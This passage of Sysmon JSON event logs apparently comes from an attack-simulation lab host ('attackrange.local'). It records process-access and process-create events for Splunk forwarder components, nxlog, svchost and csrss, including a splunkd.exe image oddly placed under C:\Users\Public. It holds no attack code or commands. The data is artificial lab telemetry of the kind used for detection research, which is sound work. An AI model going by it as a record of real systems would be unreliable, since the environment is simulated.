(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:59.505","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4533,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.896\r\nProcessGuid: {E2A3D6B1-1187-5F25-0000-0010193A0600}\r\nProcessId: 5040\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:53:59.896","ProcessGuid":"{E2A3D6B1-1187-5F25-0000-0010193A0600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4534,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.896\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1187-5F25-0000-0010193A0600}\r\nTargetProcessId: 5040\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:59.896","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1187-5F25-0000-0010193A0600}","TargetProcessId":"5040","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4535,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.896\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1187-5F25-0000-0010193A0600}\r\nTargetProcessId: 5040\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:59.896","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1187-5F25-0000-0010193A0600}","TargetProcessId":"5040","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4536,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.896\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:59.896","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4537,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.896\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:59.896","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4538,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.896\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:59.896","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4539,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.896\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:59.896","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4540,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.896\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 